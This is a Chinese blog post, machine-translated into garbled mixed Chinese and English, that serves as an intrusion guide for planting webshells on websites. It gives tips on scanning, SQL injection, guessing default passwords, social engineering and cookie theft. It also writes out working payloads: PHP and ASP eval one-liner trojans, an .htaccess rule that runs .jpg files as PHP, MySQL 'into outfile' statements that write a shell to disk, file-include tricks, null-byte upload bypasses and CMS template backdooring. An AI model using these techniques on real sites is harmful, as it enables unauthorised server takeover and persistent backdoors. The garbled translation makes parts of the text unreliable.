2022-08-02
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,You can use the browser to access left by the back door,达到控制网站服务器的目的.
1. 无论什么站,无论什么语言,i want to penetrate,第一件事就是扫目录,It's better to scan the upload point,直接上传shell,don't laugh,Sometimes you spend a long time to get a stand,Finally found that there is a ready-made upload point,and easy to guess,However, this happens inasp居多!
2. asp(aspx)+MSSQL先考虑注入,General injection hasDBownerPermissions can be written directlyshell;If you can't write,或者web与数据库分离,then guess the data,from the background,You can upload or modify configuration files in the background;
3. asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话;
4. php+MYSQL一般是注入进后台上传,Occasionally with luck, the permissions are high enough to injectselect into outfile;然后包含,分本地与远程,远程包含在高版本php是不支持的,于是想办法本地上传图片文件或者写到log里;然后php程序某某未公开的漏洞,运气好可以直接写shell.
5. jsp+MYSQL利用数据库拿权限方面基本同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell相当的容易.jsp+ORACLE的站我碰到的不多,碰到的也是猜出用户名与密码从后台下手的.
6. no matter what the station,主站一般都很安全(Otherwise, it would have been played),So generally start with the second-level domain name,Guess some usernames and passwords of the main site or get the source code of the main site,Or as a side note after getting the same network segment servercain或arp.
7. General station seldom useful ready-madeCMS的,So if you are lucky enough to find the source code,那你就发了,Injection vulnerabilities?,upload bug,Write file bug,it's all in your hands.多看看那些大站新出来的测试分站点,Those stations are still being tested,can be easily taken.
8. The upload has a truncated filename,这包括2个方面,一是00截断,The second is long filenames truncation(I used to use thishw);Then many of the file,都可以00,屡试不爽.don't forget to upload.asp(当然.asa,.cer,.cdx都可以啦)The magic of directories.
9. phpstand no matter whatwindows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在serverA variable injection or canselect into outfile,This year, I have done something that is not open sourcecms就是这个情况,一般情况下为onDon't even think about writing files,But if you have this permission, don't forget to read the source code of the file,因为load_fileThe parameters can be encoded.
10. Guessing the path or file is very necessary in the intrusion,Don't forget when you can't guess the pathgoogle(baidu太烂,google很全),So you can consider looking at the site underrobot.txt或者robots.txt,会有惊喜.
11. The use of tools is important,Before the invasion withWVSSweep will help the invasion;Although there are many injection tools,But it doesn't always work,Current soft and hard firewalls、The injection is more and more severe,Then don't be lazy,Hands-on help you grow.
12. Have you ever encountered first-class monitoring?,encounter otherpostThe firewall?,Sometimes a word can't be passed on to Malaysia,那时候,You learn to code first,Learn to transform and bypass.
13. I want to do a general site,Remember to check the copyright of this site,Find the company that does this site,Then start with other stations made by this company,Get the source code and go back,I once won a well-known pharmaceutical company website by this method.
14. Marginal ideas never go out of style,遇到dbowner的注入,can write comfortablyshellto the station you need,Save yourself the hassle;运气不好,Take it step by stepshellElevate the right to get what you need.
15. 永远别忘记社会工程学,Use social workers to think of yourself as someone who knows nothing,from the webmaster of so-and-soqq,Identity is positive,E-mail wait,Maybe sometimes there may be a surprise;Also don't forgetadmin,admin;test,test;123456,123456this simple attempt,当然,You can brute force.
16. 别忽视XSS,别忽视cookie,XSS可以偷cookie,And some more magic,learn to understand;cookie可以伪造登陆,cookie可以注入,cookie注入可以绕绝大多数的防火墙.
17. I usually do a lot of stations to collect paths.,源码啊,工具啊,充实自己的“武器”库;It's best to record your own intrusion steps,Or think about it afterwards,I usually remembertxt里,In addition, we must draw inferences from others.
18. 多学习,多看源码,see more published0day,Scripts are a prerequisite for hacking,而不是工具,Will use tools will packB你还没入门.
二、take administrative rightswebshell(进后台)
1. normal uploadwebshell
The website does not filter the suffix format of the uploaded file,直接上传Webshell即可.
这里网站(main shopping site)Mostly for convenient management,Commonly used to quickly update vulnerabilities and firewalls to reduce exposure.Upload without filtering,Filter after uploading to the server(Especially for files with passwords)
Usually uploaded toinclude目录,Because such directories usually have more script files,To upload a file of the script file name to the similar normal script name,can be confusing.Mainly used for privilege escalation.
2. 数据库备份拿Webshell
无法直接上传,Can only upload the normal picture,Rename via database backup.
如果无法修改,尝试F12change element or00截断.
3. Break through local verificationwebshell
When the site is set upjsto limit the types of files users upload,我们可以通过删除jsVerify or modify the upload type to break through uploadWebshell.
① 通过firebug修改限制
② 通过firebugDelete the test code
使用burpsuite或者是fiddleand other tools to submit,Change the local file tojpg,Block while uploading,Change the extension back toasp或php
4. Upload other script types to getwebshell
Suitable for one server with multiple websites,a网站是asp,b网站是php,而aThe website restricts the upload file type toasp的文件 ,可以尝试上传phpscript to getshell.
After uploading the image like this change it tophp,系统会自动加上asp然后执行.
Try changing the script file extension toasaor directly behind the interval.如xxx.asp.
to break through the file type restrictions for uploadingwebshell.
5. 00truncate takewebshell
在上传文件的时候,The file name you upload may be automatically changed to another name by the website.At this time, you can try to grab the upload file data package,将文件名改为xx.asp%00.jpg进行截断,拿webshell.
是GET接收情况的时候,直接用%00 就可以了,POSTupload requiresurl编码,Note that the modification here is16进制.
add a space first:
点击hexfind the space20改为00:
直接写%00,然后选中%00,右击选择convert selection的url的decode,go一下:
6. Take advantage of parsing loopholeswebshell
The name established under the website is.asp,.asa文件夹,Any file in the directory will be treated asaspfile is parsed and executed,If you can control the upload path,Then there is no need to uploadjpgYou can get it by changing your nameshell.
上传的时候,because the tail isjpg,So the upload is successful,When executed, everything after the semicolon is not executed.,So it is asasp执行(抓包改包)
Apacheis parsed from right to left,If not recognized, continue to recognize to the left.
例如1.php.owf.rar,Apache不可识别owf和rar,then this file will be treated asphp执行.
How to judge whether it is a legal suffix:upload a test1.php.rar.jpg…(Add all known suffixes)to test for legitimacy.
<?PHP fputs(fopen('xxx.php','w'),'<?php eval($_POST[a])?>');?>
访问1.jpg/.php,In this directory, a sentence Trojan will be producedxxx.php.
If the test found.htaccessFiles can be uploaded and executed,Then the opportunity will come.
AddType application/x-httpd-php .jpg
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
.htaccessThe meaning of the code in the file is to suffix the uploaded file as.jpg格式的文件以 php格式来解析文件.
7. Take the editorwebshell
Common editor bugs includefckeditor、ewebeditor、cheditor等.
Through to the website template editor write a word,Then generate a script file to takewebshell.
By adding the trojan to the compressed file,Change name to website template type,upload to web serverwebshell.
The use of a modify permissions.
1.The key file name and path,try the following pages:
admin_login.asp (Default background path)
admin_style.asp(Check if a file is directly accessible)
在14add after delete&dir=../../,until the root directory.
db/ewebeditor.mdb(默认数据库路径),After downloading, you can open it with the database management tool,Decrypt the administrator account password to log in,New styles for style management,set upload someasp,asa等脚本文件.
Sometimes you can't click to upload after adding a style. Maybe it's because of a specificIE版本才行(以IE6为例),At this time, through some tools to simulateIE6的环境.
8. 网站配置插马拿webshell
By finding the website default configuration,Insert a sentence into the middle of the website configuration.In order to be able to successfully perform the plug-in,Recommended to download the website source code,To view the source code filter rules,in case the code insertion fails.
Be sure to close:
"%><%eval request("xxxxx")%><%'
9. Take by editing the templatewebshell
Through to the website template editor write a word,Then generate a script file to takeWebshell.
By adding the trojan to the compressed file,Change name to website template type,upload to web serverWebshell.
10. Modify the script and take it directlywebshell
Some websites can modify and add script files,直接拿WebShell.
11. database command executionWebShell
通过phpmyadmin Log in the database using the database command to write with a wordWebShell.
2.Write a sentence to the table you just created
3.Query the table where a sentence is located to the file,Success will be a word written to the file
Create TABLE study (cmd text NOT NULL);
Insret INTO study (cmd) VALUES('<?php eval ($_POST[cmd])?>');
select cmd from study into outfile 'D:phpstudy_pro/www/test/test.php';
12. add static pagewebshell
Use the generated directory,配合解析漏洞.
Write a sentence Trojan into the tag,writing web pages.
13. 文件包含拿webshell
先将Webshell改为txt文件上传,Then upload a script file containing thistxt文件,可绕过waf拿webshell.
<!--#include file="123.jpg"-->
<?php include ("123.jpg")?>;
先将webshell改为TXT或jpg文件上传,Then upload a script file containing that file
Upload two files here,bao.asp和1.jpg(木马):
bao.asp:<!--#include file="1.jpg"-->
因为1.jpg是图片格式,so the code does not execute,去执行bao.asp,而bao.asp又将1.jpg(也就是木马)当做asp执行.
The calling file and the called file must be in the same directory,否则找不到,if not in the same directory:
<!--#include virtual="文件所在目录/123.jpg"-->
<?php include("1.jpg");?>
14. other ways to getwebshell
以WordPress为例:Find the update options,外观,编辑404模板,插入一句话,如果不知道404.phpIf you are in the directory, you can take a look at the next template.:
upload pluginwebshell
Find a full theme or plugin,Write a sentence in one of those little hidden corners,Then compress it and upload it.
Upload special horse,Avoid Killing Manawebshell
Upload free security software
三、普通权限拿webshell(do not enter the background)
1. 0day拿webshell
The latest I can find is also24A bug from days ago
参考工具:Dreamweaver Exploit Gadget
2. Modify the website upload type configuration to getWebShell
Some websites restrict uploading script type files in the website upload type,We can add upload file types such as addingasp | php | jsp | aspx | asa
suffix to getWebShell.
3. IISwrite permissionWebShell
Some website administrators are negligent when configuring website permissions,causes us to have write permissions,找到有IISWrite permission to the site,放进去一个txt 格式的文件,The directory must have write permission,如image文件夹,然后通过move方法,把txt Format for Trojansmoveinto script format.
原理:by findingIISWrite permission to the site,put进去一个txt文件,Must be writable directory permissions,然后通过movemethod is renamed toxxx.php
参考工具:IIS put scanner.
4. remote command executionwebshell
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数.如PHP中的system,exec,shell_exec等,When the parameters in the command execution function can be controlled,将可注入恶意系统命令到正常命令中,造成命令执行攻击.
echo "<pre>";
echo shell_exec($x);
echo "<pre>";
Then the browser to access itphp文件,跟一个zThe parameter is a sentence Trojan,输出到cracer.php文件:
Follow this in your browserphp文件,Just connect it with a kitchen knife.
5. 上传漏洞拿webshell
Some sites allow you to upload pictures,附件,文件等等.
原理:用户注册后,Some sites allow you to upload avatar images、附件、文件等,You can use this to uploadWebshell
6. SQL注入拿webshell
前提条件:具有足够权限,Permission to write to the folder where the Trojan is written,知道网站绝对路径.
对于mssql注入漏洞,网站可以通过log备份、Differential backup takeWebshell.
对于mysqlWebsites that inject vulnerabilities can passinto file函数将一句话木马写入,拿Webshell.
7. struts2拿Webshell
8. 本地JSValidate BreakthroughWebshell
When the site is set upJSto limit the types of files users upload,我们可以通过删除JSFile or modify the upload file type to break the upload limit and getWebshell.
参考工具:使用burpsuit或fiddlerProxy Tool Submission,Change the local file toXXX.jpg,Block while uploading,To change the filename suffixphp即可.
四、The background site common architecture
也可以把 WordPress当作一个内容管理系统(CMS)来使用.
1.change template
复现:第一步:in the upload subject,Upload a theme zip,The theme needs to contain trojan code.
上传了一个qiesi的压缩包,After the success of the Trojan is automatically decompressed.
dedeIs weaving the dream content management systemdedecms的简称,是一个PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统.
第一步:at file upload,Just upload the Trojan directly.
第二步:在生成—>update the homepageHTML中,将htm改成php后更新.
第一步:在模板—>广告管理—>Add advertising.
Southern Data Enterprise Website Management SystemV18Official main site、企业网站SQL版、Good enterprise website management system、企业建站系统、南方数据企业CMS、企业网站SEO、网站优化、SEOSearch engine optimization mechanism、自助建站系统、The whole station at the front desk adopts statichtmlPage templates are automatically generated.
Is made up of domestic well-knownCMSand e-commerce management software developer Kechuang Network Studio**A new generation of enterprise e-commerce system products independently developed、At the same time provide a variety of web page templates、企业网站模板、Free enterprise website system、Automatic station building system、All-round enterprise website system.
第一步:在 新闻咨询 -> 添加新闻 -> upload.
第一步:在系统管理->Constant set place,插入代码.
Pageadmin CMS
PageAdmin CMS系统是基于.NetWeb site management system,安全、稳定、灵活,More than one million users nationwide,致力于为企业、学校、The government website construction and production to provide enterprise content management system solutions.
1.自解压 getshell
第一步:in file management,Choose a template to upload,Then upload a zip file,The compressed package contains a Trojan horse.
第三步:验证,Can use database for command execution.
